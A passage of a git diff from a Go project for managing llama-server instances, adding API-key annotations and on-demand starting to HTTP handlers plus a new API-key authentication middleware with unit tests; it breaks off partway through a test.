func (h *Handler) ListDevicesHandler() http.HandlerFunc { func (h *Handler) LlamaServerListDevicesHandler() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) { return func(w http.ResponseWriter, r *http.Request) {
listCmd := exec.Command("llama-server", "--list-devices") listCmd := exec.Command("llama-server", "--list-devices")
output, err := listCmd.CombinedOutput() output, err := listCmd.CombinedOutput()
@@ -92,8 +114,9 @@ func (h *Handler) ListDevicesHandler() http.HandlerFunc {
// @Summary List all instances // @Summary List all instances
// @Description Returns a list of all instances managed by the server // @Description Returns a list of all instances managed by the server
// @Tags instances // @Tags instances
// @Security ApiKeyAuth
// @Produces json // @Produces json
// @Success 200 {array} Instance "List of instances" // @Success 200 {array} instance.Process "List of instances"
// @Failure 500 {string} string "Internal Server Error" // @Failure 500 {string} string "Internal Server Error"
// @Router /instances [get] // @Router /instances [get]
func (h *Handler) ListInstances() http.HandlerFunc { func (h *Handler) ListInstances() http.HandlerFunc {
@@ -116,11 +139,12 @@ func (h *Handler) ListInstances() http.HandlerFunc {
// @Summary Create and start a new instance // @Summary Create and start a new instance
// @Description Creates a new instance with the provided configuration options // @Description Creates a new instance with the provided configuration options
// @Tags instances // @Tags instances
// @Security ApiKeyAuth
// @Accept json // @Accept json
// @Produces json // @Produces json
// @Param name path string true "Instance Name" // @Param name path string true "Instance Name"
// @Param options body CreateInstanceOptions true "Instance configuration options" // @Param options body instance.CreateInstanceOptions true "Instance configuration options"
// @Success 201 {object} Instance "Created instance details" // @Success 201 {object} instance.Process "Created instance details"
// @Failure 400 {string} string "Invalid request body" // @Failure 400 {string} string "Invalid request body"
// @Failure 500 {string} string "Internal Server Error" // @Failure 500 {string} string "Internal Server Error"
// @Router /instances/{name} [post] // @Router /instances/{name} [post]
@@ -132,13 +156,13 @@ func (h *Handler) CreateInstance() http.HandlerFunc {
return return
} }
var options CreateInstanceOptions var options instance.CreateInstanceOptions
if err := json.NewDecoder(r.Body).Decode(&options); err != nil { if err := json.NewDecoder(r.Body).Decode(&options); err != nil {
http.Error(w, "Invalid request body", http.StatusBadRequest) http.Error(w, "Invalid request body", http.StatusBadRequest)
return return
} }
instance, err := h.InstanceManager.CreateInstance(name, &options) inst, err := h.InstanceManager.CreateInstance(name, &options)
if err != nil { if err != nil {
http.Error(w, "Failed to create instance: "+err.Error(), http.StatusInternalServerError) http.Error(w, "Failed to create instance: "+err.Error(), http.StatusInternalServerError)
return return
@@ -146,7 +170,7 @@ func (h *Handler) CreateInstance() http.HandlerFunc {
w.Header().Set("Content-Type", "application/json") w.Header().Set("Content-Type", "application/json")
w.WriteHeader(http.StatusCreated) w.WriteHeader(http.StatusCreated)
if err := json.NewEncoder(w).Encode(instance); err != nil { if err := json.NewEncoder(w).Encode(inst); err != nil {
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError) http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
return return
} }
@@ -157,9 +181,10 @@ func (h *Handler) CreateInstance() http.HandlerFunc {
// @Summary Get details of a specific instance // @Summary Get details of a specific instance
// @Description Returns the details of a specific instance by name // @Description Returns the details of a specific instance by name
// @Tags instances // @Tags instances
// @Security ApiKeyAuth
// @Produces json // @Produces json
// @Param name path string true "Instance Name" // @Param name path string true "Instance Name"
// @Success 200 {object} Instance "Instance details" // @Success 200 {object} instance.Process "Instance details"
// @Failure 400 {string} string "Invalid name format" // @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error" // @Failure 500 {string} string "Internal Server Error"
// @Router /instances/{name} [get] // @Router /instances/{name} [get]
@@ -171,14 +196,14 @@ func (h *Handler) GetInstance() http.HandlerFunc {
return return
} }
instance, err := h.InstanceManager.GetInstance(name) inst, err := h.InstanceManager.GetInstance(name)
if err != nil { if err != nil {
http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError) http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
return return
} }
w.Header().Set("Content-Type", "application/json") w.Header().Set("Content-Type", "application/json")
if err := json.NewEncoder(w).Encode(instance); err != nil { if err := json.NewEncoder(w).Encode(inst); err != nil {
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError) http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
return return
} }
@@ -189,11 +214,12 @@ func (h *Handler) GetInstance() http.HandlerFunc {
// @Summary Update an instance's configuration // @Summary Update an instance's configuration
// @Description Updates the configuration of a specific instance by name // @Description Updates the configuration of a specific instance by name
// @Tags instances // @Tags instances
// @Security ApiKeyAuth
// @Accept json // @Accept json
// @Produces json // @Produces json
// @Param name path string true "Instance Name" // @Param name path string true "Instance Name"
// @Param options body CreateInstanceOptions true "Instance configuration options" // @Param options body instance.CreateInstanceOptions true "Instance configuration options"
// @Success 200 {object} Instance "Updated instance details" // @Success 200 {object} instance.Process "Updated instance details"
// @Failure 400 {string} string "Invalid name format" // @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error" // @Failure 500 {string} string "Internal Server Error"
// @Router /instances/{name} [put] // @Router /instances/{name} [put]
@@ -205,20 +231,20 @@ func (h *Handler) UpdateInstance() http.HandlerFunc {
return return
} }
var options CreateInstanceOptions var options instance.CreateInstanceOptions
if err := json.NewDecoder(r.Body).Decode(&options); err != nil { if err := json.NewDecoder(r.Body).Decode(&options); err != nil {
http.Error(w, "Invalid request body", http.StatusBadRequest) http.Error(w, "Invalid request body", http.StatusBadRequest)
return return
} }
instance, err := h.InstanceManager.UpdateInstance(name, &options) inst, err := h.InstanceManager.UpdateInstance(name, &options)
if err != nil { if err != nil {
http.Error(w, "Failed to update instance: "+err.Error(), http.StatusInternalServerError) http.Error(w, "Failed to update instance: "+err.Error(), http.StatusInternalServerError)
return return
} }
w.Header().Set("Content-Type", "application/json") w.Header().Set("Content-Type", "application/json")
if err := json.NewEncoder(w).Encode(instance); err != nil { if err := json.NewEncoder(w).Encode(inst); err != nil {
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError) http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
return return
} }
@@ -229,9 +255,10 @@ func (h *Handler) UpdateInstance() http.HandlerFunc {
// @Summary Start a stopped instance // @Summary Start a stopped instance
// @Description Starts a specific instance by name // @Description Starts a specific instance by name
// @Tags instances // @Tags instances
// @Security ApiKeyAuth
// @Produces json // @Produces json
// @Param name path string true "Instance Name" // @Param name path string true "Instance Name"
// @Success 200 {object} Instance "Started instance details" // @Success 200 {object} instance.Process "Started instance details"
// @Failure 400 {string} string "Invalid name format" // @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error" // @Failure 500 {string} string "Internal Server Error"
// @Router /instances/{name}/start [post] // @Router /instances/{name}/start [post]
@@ -243,14 +270,20 @@ func (h *Handler) StartInstance() http.HandlerFunc {
return return
} }
instance, err := h.InstanceManager.StartInstance(name) inst, err := h.InstanceManager.StartInstance(name)
if err != nil { if err != nil {
// Check if error is due to maximum running instances limit
if _, ok := err.(manager.MaxRunningInstancesError); ok {
http.Error(w, err.Error(), http.StatusConflict)
return
}
http.Error(w, "Failed to start instance: "+err.Error(), http.StatusInternalServerError) http.Error(w, "Failed to start instance: "+err.Error(), http.StatusInternalServerError)
return return
} }
w.Header().Set("Content-Type", "application/json") w.Header().Set("Content-Type", "application/json")
if err := json.NewEncoder(w).Encode(instance); err != nil { if err := json.NewEncoder(w).Encode(inst); err != nil {
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError) http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
return return
} }
@@ -261,9 +294,10 @@ func (h *Handler) StartInstance() http.HandlerFunc {
// @Summary Stop a running instance // @Summary Stop a running instance
// @Description Stops a specific instance by name // @Description Stops a specific instance by name
// @Tags instances // @Tags instances
// @Security ApiKeyAuth
// @Produces json // @Produces json
// @Param name path string true "Instance Name" // @Param name path string true "Instance Name"
// @Success 200 {object} Instance "Stopped instance details" // @Success 200 {object} instance.Process "Stopped instance details"
// @Failure 400 {string} string "Invalid name format" // @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error" // @Failure 500 {string} string "Internal Server Error"
// @Router /instances/{name}/stop [post] // @Router /instances/{name}/stop [post]
@@ -275,14 +309,14 @@ func (h *Handler) StopInstance() http.HandlerFunc {
return return
} }
instance, err := h.InstanceManager.StopInstance(name) inst, err := h.InstanceManager.StopInstance(name)
if err != nil { if err != nil {
http.Error(w, "Failed to stop instance: "+err.Error(), http.StatusInternalServerError) http.Error(w, "Failed to stop instance: "+err.Error(), http.StatusInternalServerError)
return return
} }
w.Header().Set("Content-Type", "application/json") w.Header().Set("Content-Type", "application/json")
if err := json.NewEncoder(w).Encode(instance); err != nil { if err := json.NewEncoder(w).Encode(inst); err != nil {
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError) http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
return return
} }
@@ -293,9 +327,10 @@ func (h *Handler) StopInstance() http.HandlerFunc {
// @Summary Restart a running instance // @Summary Restart a running instance
// @Description Restarts a specific instance by name // @Description Restarts a specific instance by name
// @Tags instances // @Tags instances
// @Security ApiKeyAuth
// @Produces json // @Produces json
// @Param name path string true "Instance Name" // @Param name path string true "Instance Name"
// @Success 200 {object} Instance "Restarted instance details" // @Success 200 {object} instance.Process "Restarted instance details"
// @Failure 400 {string} string "Invalid name format" // @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error" // @Failure 500 {string} string "Internal Server Error"
// @Router /instances/{name}/restart [post] // @Router /instances/{name}/restart [post]
@@ -307,14 +342,14 @@ func (h *Handler) RestartInstance() http.HandlerFunc {
return return
} }
instance, err := h.InstanceManager.RestartInstance(name) inst, err := h.InstanceManager.RestartInstance(name)
if err != nil { if err != nil {
http.Error(w, "Failed to restart instance: "+err.Error(), http.StatusInternalServerError) http.Error(w, "Failed to restart instance: "+err.Error(), http.StatusInternalServerError)
return return
} }
w.Header().Set("Content-Type", "application/json") w.Header().Set("Content-Type", "application/json")
if err := json.NewEncoder(w).Encode(instance); err != nil { if err := json.NewEncoder(w).Encode(inst); err != nil {
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError) http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
return return
} }
@@ -325,6 +360,7 @@ func (h *Handler) RestartInstance() http.HandlerFunc {
// @Summary Delete an instance // @Summary Delete an instance
// @Description Stops and removes a specific instance by name // @Description Stops and removes a specific instance by name
// @Tags instances // @Tags instances
// @Security ApiKeyAuth
// @Param name path string true "Instance Name" // @Param name path string true "Instance Name"
// @Success 204 "No Content" // @Success 204 "No Content"
// @Failure 400 {string} string "Invalid name format" // @Failure 400 {string} string "Invalid name format"
@@ -351,6 +387,7 @@ func (h *Handler) DeleteInstance() http.HandlerFunc {
// @Summary Get logs from a specific instance // @Summary Get logs from a specific instance
// @Description Returns the logs from a specific instance by name with optional line limit // @Description Returns the logs from a specific instance by name with optional line limit
// @Tags instances // @Tags instances
// @Security ApiKeyAuth
// @Param name path string true "Instance Name" // @Param name path string true "Instance Name"
// @Param lines query string false "Number of lines to retrieve (default: all lines)" // @Param lines query string false "Number of lines to retrieve (default: all lines)"
// @Produces text/plain // @Produces text/plain
@@ -377,13 +414,13 @@ func (h *Handler) GetInstanceLogs() http.HandlerFunc {
return return
} }
instance, err := h.InstanceManager.GetInstance(name) inst, err := h.InstanceManager.GetInstance(name)
if err != nil { if err != nil {
http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError) http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
return return
} }
logs, err := instance.GetLogs(num_lines) logs, err := inst.GetLogs(num_lines)
if err != nil { if err != nil {
http.Error(w, "Failed to get logs: "+err.Error(), http.StatusInternalServerError) http.Error(w, "Failed to get logs: "+err.Error(), http.StatusInternalServerError)
return return
@@ -398,6 +435,7 @@ func (h *Handler) GetInstanceLogs() http.HandlerFunc {
// @Summary Proxy requests to a specific instance // @Summary Proxy requests to a specific instance
// @Description Forwards HTTP requests to the llama-server instance running on a specific port // @Description Forwards HTTP requests to the llama-server instance running on a specific port
// @Tags instances // @Tags instances
// @Security ApiKeyAuth
// @Param name path string true "Instance Name" // @Param name path string true "Instance Name"
// @Success 200 "Request successfully proxied to instance" // @Success 200 "Request successfully proxied to instance"
// @Failure 400 {string} string "Invalid name format" // @Failure 400 {string} string "Invalid name format"
@@ -413,19 +451,19 @@ func (h *Handler) ProxyToInstance() http.HandlerFunc {
return return
} }
instance, err := h.InstanceManager.GetInstance(name) inst, err := h.InstanceManager.GetInstance(name)
if err != nil { if err != nil {
http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError) http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
return return
} }
if !instance.Running { if !inst.IsRunning() {
http.Error(w, "Instance is not running", http.StatusServiceUnavailable) http.Error(w, "Instance is not running", http.StatusServiceUnavailable)
return return
} }
// Get the cached proxy for this instance // Get the cached proxy for this instance
proxy, err := instance.GetProxy() proxy, err := inst.GetProxy()
if err != nil { if err != nil {
http.Error(w, "Failed to get proxy: "+err.Error(), http.StatusInternalServerError) http.Error(w, "Failed to get proxy: "+err.Error(), http.StatusInternalServerError)
return return
@@ -440,6 +478,9 @@ func (h *Handler) ProxyToInstance() http.HandlerFunc {
proxyPath = "/" + proxyPath proxyPath = "/" + proxyPath
} }
// Update the last request time for the instance
inst.UpdateLastRequestTime()
// Modify the request to remove the proxy prefix // Modify the request to remove the proxy prefix
originalPath := r.URL.Path originalPath := r.URL.Path
r.URL.Path = proxyPath r.URL.Path = proxyPath
@@ -462,6 +503,7 @@ func (h *Handler) ProxyToInstance() http.HandlerFunc {
// @Summary List instances in OpenAI-compatible format // @Summary List instances in OpenAI-compatible format
// @Description Returns a list of instances in a format compatible with OpenAI API // @Description Returns a list of instances in a format compatible with OpenAI API
// @Tags openai // @Tags openai
// @Security ApiKeyAuth
// @Produces json // @Produces json
// @Success 200 {object} OpenAIListInstancesResponse "List of OpenAI-compatible instances" // @Success 200 {object} OpenAIListInstancesResponse "List of OpenAI-compatible instances"
// @Failure 500 {string} string "Internal Server Error" // @Failure 500 {string} string "Internal Server Error"
@@ -475,11 +517,11 @@ func (h *Handler) OpenAIListInstances() http.HandlerFunc {
} }
openaiInstances := make([]OpenAIInstance, len(instances)) openaiInstances := make([]OpenAIInstance, len(instances))
for i, instance := range instances { for i, inst := range instances {
openaiInstances[i] = OpenAIInstance{ openaiInstances[i] = OpenAIInstance{
ID: instance.Name, ID: inst.Name,
Object: "model", Object: "model",
Created: instance.Created, Created: inst.Created,
OwnedBy: "llamactl", OwnedBy: "llamactl",
} }
} }
@@ -499,8 +541,9 @@ func (h *Handler) OpenAIListInstances() http.HandlerFunc {
// OpenAIProxy godoc // OpenAIProxy godoc
// @Summary OpenAI-compatible proxy endpoint // @Summary OpenAI-compatible proxy endpoint
// @Description Handles all POST requests to /v1/*, routing to the appropriate instance based on the request body // @Description Handles all POST requests to /v1/*, routing to the appropriate instance based on the request body. Requires API key authentication via the `Authorization` header.
// @Tags openai // @Tags openai
// @Security ApiKeyAuth
// @Accept json // @Accept json
// @Produces json // @Produces json
// @Success 200 "OpenAI response" // @Success 200 "OpenAI response"
@@ -530,24 +573,55 @@ func (h *Handler) OpenAIProxy() http.HandlerFunc {
return return
} }
// Route to the appropriate instance based on model name // Route to the appropriate inst based on model name
instance, err := h.InstanceManager.GetInstance(modelName) inst, err := h.InstanceManager.GetInstance(modelName)
if err != nil { if err != nil {
http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError) http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
return return
} }
if !instance.Running { if !inst.IsRunning() {
http.Error(w, "Instance is not running", http.StatusServiceUnavailable) allowOnDemand := inst.GetOptions() != nil && inst.GetOptions().OnDemandStart != nil && *inst.GetOptions().OnDemandStart
return if !allowOnDemand {
http.Error(w, "Instance is not running", http.StatusServiceUnavailable)
return
}
if h.InstanceManager.IsMaxRunningInstancesReached() {
if h.cfg.Instances.EnableLRUEviction {
err := h.InstanceManager.EvictLRUInstance()
if err != nil {
http.Error(w, "Cannot start Instance, failed to evict instance "+err.Error(), http.StatusInternalServerError)
return
}
} else {
http.Error(w, "Cannot start Instance, maximum number of instances reached", http.StatusConflict)
return
}
}
// If on-demand start is enabled, start the instance
if _, err := h.InstanceManager.StartInstance(modelName); err != nil {
http.Error(w, "Failed to start instance: "+err.Error(), http.StatusInternalServerError)
return
}
// Wait for the instance to become healthy before proceeding
if err := inst.WaitForHealthy(h.cfg.Instances.OnDemandStartTimeout); err != nil { // 2 minutes timeout
http.Error(w, "Instance failed to become healthy: "+err.Error(), http.StatusServiceUnavailable)
return
}
} }
proxy, err := instance.GetProxy() proxy, err := inst.GetProxy()
if err != nil { if err != nil {
http.Error(w, "Failed to get proxy: "+err.Error(), http.StatusInternalServerError) http.Error(w, "Failed to get proxy: "+err.Error(), http.StatusInternalServerError)
return return
} }
// Update last request time for the instance
inst.UpdateLastRequestTime()
// Recreate the request body from the bytes we read // Recreate the request body from the bytes we read
r.Body = io.NopCloser(bytes.NewReader(bodyBytes)) r.Body = io.NopCloser(bytes.NewReader(bodyBytes))
r.ContentLength = int64(len(bodyBytes)) r.ContentLength = int64(len(bodyBytes))

189
pkg/server/middleware.go Normal file
View File

@@ -0,0 +1,189 @@
package server
import (
"crypto/rand"
"crypto/subtle"
"encoding/hex"
"fmt"
"llamactl/pkg/config"
"log"
"net/http"
"os"
"strings"
)
type KeyType int
const (
KeyTypeInference KeyType = iota
KeyTypeManagement
)
type APIAuthMiddleware struct {
requireInferenceAuth bool
inferenceKeys map[string]bool
requireManagementAuth bool
managementKeys map[string]bool
}
// NewAPIAuthMiddleware creates a new APIAuthMiddleware with the given configuration
func NewAPIAuthMiddleware(authCfg config.AuthConfig) *APIAuthMiddleware {
var generated bool = false
inferenceAPIKeys := make(map[string]bool)
managementAPIKeys := make(map[string]bool)
const banner = "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
if authCfg.RequireManagementAuth && len(authCfg.ManagementKeys) == 0 {
key := generateAPIKey(KeyTypeManagement)
managementAPIKeys[key] = true
generated = true
fmt.Printf("%s\n⚠ MANAGEMENT AUTHENTICATION REQUIRED\n%s\n", banner, banner)
fmt.Printf("🔑 Generated Management API Key:\n\n %s\n\n", key)
}
for _, key := range authCfg.ManagementKeys {
managementAPIKeys[key] = true
}
if authCfg.RequireInferenceAuth && len(authCfg.InferenceKeys) == 0 {
key := generateAPIKey(KeyTypeInference)
inferenceAPIKeys[key] = true
generated = true
fmt.Printf("%s\n⚠ INFERENCE AUTHENTICATION REQUIRED\n%s\n", banner, banner)
fmt.Printf("🔑 Generated Inference API Key:\n\n %s\n\n", key)
}
for _, key := range authCfg.InferenceKeys {
inferenceAPIKeys[key] = true
}
if generated {
fmt.Printf("%s\n⚠ IMPORTANT\n%s\n", banner, banner)
fmt.Println("• These keys are auto-generated and will change on restart")
fmt.Println("• For production, add explicit keys to your configuration")
fmt.Println("• Copy these keys before they disappear from the terminal")
fmt.Println(banner)
}
return &APIAuthMiddleware{
requireInferenceAuth: authCfg.RequireInferenceAuth,
inferenceKeys: inferenceAPIKeys,
requireManagementAuth: authCfg.RequireManagementAuth,
managementKeys: managementAPIKeys,
}
}
// generateAPIKey creates a cryptographically secure API key
func generateAPIKey(keyType KeyType) string {
// Generate 32 random bytes (256 bits)
randomBytes := make([]byte, 32)
var prefix string
switch keyType {
case KeyTypeInference:
prefix = "sk-inference"
case KeyTypeManagement:
prefix = "sk-management"
default:
prefix = "sk-unknown"
}
if _, err := rand.Read(randomBytes); err != nil {
log.Printf("Warning: Failed to generate secure random key, using fallback")
// Fallback to a less secure method if crypto/rand fails
return fmt.Sprintf("%s-fallback-%d", prefix, os.Getpid())
}
// Convert to hex and add prefix
return fmt.Sprintf("%s-%s", prefix, hex.EncodeToString(randomBytes))
}
// AuthMiddleware returns a middleware that checks API keys for the given key type
func (a *APIAuthMiddleware) AuthMiddleware(keyType KeyType) func(http.Handler) http.Handler {
return func(next http.Handler) http.Handler {
return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
if r.Method == "OPTIONS" {
next.ServeHTTP(w, r)
return
}
apiKey := a.extractAPIKey(r)
if apiKey == "" {
a.unauthorized(w, "Missing API key")
return
}
var isValid bool
switch keyType {
case KeyTypeInference:
// Management keys also work for OpenAI endpoints (higher privilege)
isValid = a.isValidKey(apiKey, KeyTypeInference) || a.isValidKey(apiKey, KeyTypeManagement)
case KeyTypeManagement:
isValid = a.isValidKey(apiKey, KeyTypeManagement)
default:
isValid = false
}
if !isValid {
a.unauthorized(w, "Invalid API key")
return
}
next.ServeHTTP(w, r)
})
}
}
// extractAPIKey extracts the API key from the request
func (a *APIAuthMiddleware) extractAPIKey(r *http.Request) string {
// Check Authorization header: "Bearer sk-..."
if auth := r.Header.Get("Authorization"); auth != "" {
if after, ok := strings.CutPrefix(auth, "Bearer "); ok {
return after
}
}
// Check X-API-Key header
if apiKey := r.Header.Get("X-API-Key"); apiKey != "" {
return apiKey
}
// Check query parameter
if apiKey := r.URL.Query().Get("api_key"); apiKey != "" {
return apiKey
}
return ""
}
// isValidKey checks if the provided API key is valid for the given key type
func (a *APIAuthMiddleware) isValidKey(providedKey string, keyType KeyType) bool {
var validKeys map[string]bool
switch keyType {
case KeyTypeInference:
validKeys = a.inferenceKeys
case KeyTypeManagement:
validKeys = a.managementKeys
default:
return false
}
for validKey := range validKeys {
if len(providedKey) == len(validKey) &&
subtle.ConstantTimeCompare([]byte(providedKey), []byte(validKey)) == 1 {
return true
}
}
return false
}
// unauthorized sends an unauthorized response
func (a *APIAuthMiddleware) unauthorized(w http.ResponseWriter, message string) {
w.Header().Set("Content-Type", "application/json")
w.WriteHeader(http.StatusUnauthorized)
response := fmt.Sprintf(`{"error": {"message": "%s", "type": "authentication_error"}}`, message)
w.Write([]byte(response))
}

View File

@@ -0,0 +1,354 @@
package server_test
import (
"llamactl/pkg/config"
"llamactl/pkg/server"
"net/http"
"net/http/httptest"
"strings"
"testing"
)
func TestAuthMiddleware(t *testing.T) {
tests := []struct {
name string
keyType server.KeyType
inferenceKeys []string
managementKeys []string
requestKey string
method string
expectedStatus int
}{
// Valid key tests
{
name: "valid inference key for inference",
keyType: server.KeyTypeInference,
inferenceKeys: []string{"sk-inference-valid123"},
requestKey: "sk-inference-valid123",
method: "GET",
expectedStatus: http.StatusOK,
},
{
name: "valid management key for inference", // Management keys work for inference
keyType: server.KeyTypeInference,
managementKeys: []string{"sk-management-admin123"},
requestKey: "sk-management-admin123",
method: "GET",
expectedStatus: http.StatusOK,
},
{
name: "valid management key for management",
keyType: server.KeyTypeManagement,
managementKeys: []string{"sk-management-admin123"},
requestKey: "sk-management-admin123",
method: "GET",
expectedStatus: http.StatusOK,
},
// Invalid key tests
{
name: "inference key for management should fail",
keyType: server.KeyTypeManagement,
inferenceKeys: []string{"sk-inference-user123"},
requestKey: "sk-inference-user123",
method: "GET",
expectedStatus: http.StatusUnauthorized,
},
{
name: "invalid inference key",
keyType: server.KeyTypeInference,
inferenceKeys: []string{"sk-inference-valid123"},
requestKey: "sk-inference-invalid",
method: "GET",
expectedStatus: http.StatusUnauthorized,
},
{
name: "missing inference key",
keyType: server.KeyTypeInference,
inferenceKeys: []string{"sk-inference-valid123"},
requestKey: "",
method: "GET",
expectedStatus: http.StatusUnauthorized,
},
{
name: "invalid management key",
keyType: server.KeyTypeManagement,
managementKeys: []string{"sk-management-valid123"},
requestKey: "sk-management-invalid",
method: "GET",
expectedStatus: http.StatusUnauthorized,
},
{
name: "missing management key",
keyType: server.KeyTypeManagement,
managementKeys: []string{"sk-management-valid123"},
requestKey: "",
method: "GET",
expectedStatus: http.StatusUnauthorized,
},
// OPTIONS requests should always pass
{
name: "OPTIONS request bypasses inference auth",
keyType: server.KeyTypeInference,
inferenceKeys: []string{"sk-inference-valid123"},
requestKey: "",
method: "OPTIONS",
expectedStatus: http.StatusOK,
},
{
name: "OPTIONS request bypasses management auth",
keyType: server.KeyTypeManagement,
managementKeys: []string{"sk-management-valid123"},
requestKey: "",
method: "OPTIONS",
expectedStatus: http.StatusOK,
},
// Cross-key-type validation
{
name: "management key works for inference endpoint",
keyType: server.KeyTypeInference,
inferenceKeys: []string{},
managementKeys: []string{"sk-management-admin"},
requestKey: "sk-management-admin",
method: "POST",
expectedStatus: http.StatusOK,
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
cfg := config.AuthConfig{
InferenceKeys: tt.inferenceKeys,
ManagementKeys: tt.managementKeys,
}
middleware := server.NewAPIAuthMiddleware(cfg)
// Create test request
req := httptest.NewRequest(tt.method, "/test", nil)
if tt.requestKey != "" {
req.Header.Set("Authorization", "Bearer "+tt.requestKey)
}
// Create test handler using the appropriate middleware
var handler http.Handler
if tt.keyType == server.KeyTypeInference {
handler = middleware.AuthMiddleware(server.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))
} else {
handler = middleware.AuthMiddleware(server.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))
}
// Execute request
recorder := httptest.NewRecorder()
handler.ServeHTTP(recorder, req)
if recorder.Code != tt.expectedStatus {
t.Errorf("AuthMiddleware() status = %v, expected %v", recorder.Code, tt.expectedStatus)
}
// Check that unauthorized responses have proper format
if recorder.Code == http.StatusUnauthorized {
contentType := recorder.Header().Get("Content-Type")
if contentType != "application/json" {
t.Errorf("Unauthorized response Content-Type = %v, expected application/json", contentType)
}
body := recorder.Body.String()
if !strings.Contains(body, `"type": "authentication_error"`) {
t.Errorf("Unauthorized response missing proper error type: %v", body)
}
}
})
}
}
func TestGenerateAPIKey(t *testing.T) {
tests := []struct {
name string
keyType server.KeyType
}{
{"inference key generation", server.KeyTypeInference},
{"management key generation", server.KeyTypeManagement},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
// Test auto-generation by creating config that will trigger it
var config config.AuthConfig
if tt.keyType == server.KeyTypeInference {
config.RequireInferenceAuth = true
config.InferenceKeys = []string{} // Empty to trigger generation
} else {
config.RequireManagementAuth = true
config.ManagementKeys = []string{} // Empty to trigger generation
}
// Create middleware - this should trigger key generation
middleware := server.NewAPIAuthMiddleware(config)
// Test that auth is required (meaning a key was generated)
req := httptest.NewRequest("GET", "/", nil)
recorder := httptest.NewRecorder()
var handler http.Handler
if tt.keyType == server.KeyTypeInference {
handler = middleware.AuthMiddleware(server.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))
} else {
handler = middleware.AuthMiddleware(server.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))
}
handler.ServeHTTP(recorder, req)
// Should be unauthorized without a key (proving that a key was generated and auth is working)
if recorder.Code != http.StatusUnauthorized {
t.Errorf("Expected unauthorized without key, got status %v", recorder.Code)
}
// Test uniqueness by creating another middleware instance
middleware2 := server.NewAPIAuthMiddleware(config)
req2 := httptest.NewRequest("GET", "/", nil)
recorder2 := httptest.NewRecorder()
if tt.keyType == server.KeyTypeInference {
handler2 := middleware2.AuthMiddleware(server.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))
handler2.ServeHTTP(recorder2, req2)
} else {
handler2 := middleware2.AuthMiddleware(server.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))
handler2.ServeHTTP(recorder2, req2)
}
// Both should require auth (proving keys were generated for both instances)
if recorder2.Code != http.StatusUnauthorized {
t.Errorf("Expected unauthorized for second middleware without key, got status %v", recorder2.Code)
}
})
}
}
func TestAutoGeneration(t *testing.T) {
tests := []struct {
name string
requireInference bool
requireManagement bool
providedInference []string
providedManagement []string
shouldGenerateInf bool // Whether inference key should be generated
shouldGenerateMgmt bool // Whether management key should be generated
}{
{
name: "inference auth required, keys provided - no generation",
requireInference: true,
requireManagement: false,
providedInference: []string{"sk-inference-provided"},
providedManagement: []string{},
shouldGenerateInf: false,
shouldGenerateMgmt: false,
},
{
name: "inference auth required, no keys - should auto-generate",
requireInference: true,
requireManagement: false,
providedInference: []string{},
providedManagement: []string{},
shouldGenerateInf: true,
shouldGenerateMgmt: false,
},
{
name: "management auth required, keys provided - no generation",
requireInference: false,
requireManagement: true,
providedInference: []string{},
providedManagement: []string{"sk-management-provided"},
shouldGenerateInf: false,
shouldGenerateMgmt: false,
},
{
name: "management auth required, no keys - should auto-generate",
requireInference: false,
requireManagement: true,
providedInference: []string{},
providedManagement: []string{},
shouldGenerateInf: false,
shouldGenerateMgmt: true,
},
{
name: "both required, both provided - no generation",
requireInference: true,
requireManagement: true,
providedInference: []string{"sk-inference-provided"},
providedManagement: []string{"sk-management-provided"},
shouldGenerateInf: false,
shouldGenerateMgmt: false,
},
{
name: "both required, none provided - should auto-generate both",
requireInference: true,
requireManagement: true,
providedInference: []string{},
providedManagement: []string{},
shouldGenerateInf: true,
shouldGenerateMgmt: true,
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
cfg := config.AuthConfig{
RequireInferenceAuth: tt.requireInference,
RequireManagementAuth: tt.requireManagement,
InferenceKeys: tt.providedInference,
ManagementKeys: tt.providedManagement,
}
